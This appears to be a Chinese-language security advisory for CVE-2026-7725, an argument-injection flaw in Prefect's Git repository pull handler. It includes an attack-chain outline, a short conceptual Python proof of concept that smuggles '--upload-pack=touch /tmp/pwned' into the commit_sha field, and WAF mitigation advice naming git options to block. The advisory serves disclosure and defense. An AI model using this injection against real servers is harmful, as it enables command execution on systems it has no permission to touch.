CVE-2026-7725 Prefect参数注入漏洞

漏洞信息

漏洞编号

CVE-2026-7725

漏洞类型

参数注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PrefectHQ prefect

漏洞概述

PrefectHQ prefect是一款流行的开源工作流编排工具。在其3.6.25.dev6及更早版本中，src/prefect/runner/storage.py文件的GitRepository Pull Handler组件被发现存在参数注入漏洞。攻击者能够通过恶意构造commit_sha或directories参数，在无需交互的情况下远程利用该漏洞。该漏洞可能导致机密性、完整性和可用性受到低程度影响，且利用代码已公开披露。官方已迅速响应并发布了修复版本。

技术细节

该漏洞的核心在于Prefect处理Git仓库拉取操作时，对用户输入的参数缺乏严格的验证。具体受影响的是src/prefect/runner/storage.py文件中的GitRepository Pull Handler功能。当系统处理Git仓库拉取请求时，会将用户提供的commit_sha（提交哈希）和directories（目录）参数直接传递给底层的Git命令执行环境，未进行充分的清洗或转义。攻击者可以利用这一缺陷，在这些参数中注入特定的Shell命令或Git参数（如--upload-pack）。由于攻击复杂度低且无需用户交互，远程攻击者只需诱导系统处理特制的Git请求，即可在目标服务器上执行注入的参数，从而可能窃取数据或破坏服务。补丁分析显示，修复内容加强了对这些参数的校验逻辑。

攻击链分析

STEP 1

侦察

攻击者识别出运行PrefectHQ prefect 3.6.25.dev6或更早版本的目标服务器，并确认其GitRepository Pull Handler接口可访问。

STEP 2

构建载荷

攻击者构造包含恶意Git参数（如--upload-pack）的HTTP请求，将其嵌入到commit_sha或directories参数中。

STEP 3

发送请求

攻击者向目标服务器的API端点发送特制的Git仓库拉取请求，触发漏洞。

STEP 4

执行注入

由于缺乏参数校验，后端将恶意参数传递给底层Git命令执行，导致攻击者预期的操作被执行（如命令执行或文件读写）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-7725
# Targeting the argument injection in the GitRepository Pull Handler

target_url = "http://vulnerable-host:4200/api/git/pull" # Hypothetical endpoint

# Malicious payload injecting arguments into commit_sha
# Attempts to use git argument injection to execute commands
payload = {
    "name": "test-repo",
    "url": "https://github.com/PrefectHQ/prefect.git",
    "branch": "main",
    "commit_sha": "--upload-pack=touch /tmp/pwned",  # Injected argument
    "directories": "."
}

print("[*] Sending malicious request to target...")

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if the file /tmp/pwned was created.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

PrefectHQ prefect <= 3.6.25.dev6

防御指南

临时缓解措施

如果无法立即升级，建议通过防火墙或安全组限制对Prefect相关API端点的访问，仅允许可信的内部IP调用。同时，可以在应用网关层部署WAF规则，检测并拦截包含Git特殊参数（如--upload-pack、--exec等）的HTTP请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7725
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7725
3 Details https://www.cvedetails.com/cve/CVE-2026-7725/
4 VulDB https://vuldb.com/cve/CVE-2026-7725
5 Link https://gist.github.com/nedlir/c37d90dda5f715790eafc970b2ef0c8a
6 Link https://github.com/PrefectHQ/prefect/
7 Link https://github.com/PrefectHQ/prefect/commit/6a9d9918716ce4ee0297b69f3046f7067ef1faae
8 Link https://github.com/PrefectHQ/prefect/pull/21384
9 Link https://github.com/PrefectHQ/prefect/releases/tag/3.6.25.dev7
10 Link https://vuldb.com/submit/807356
11 Link https://vuldb.com/vuln/360901
12 Link https://vuldb.com/vuln/360901/cti
13 Link https://vuldb.com/submit/807356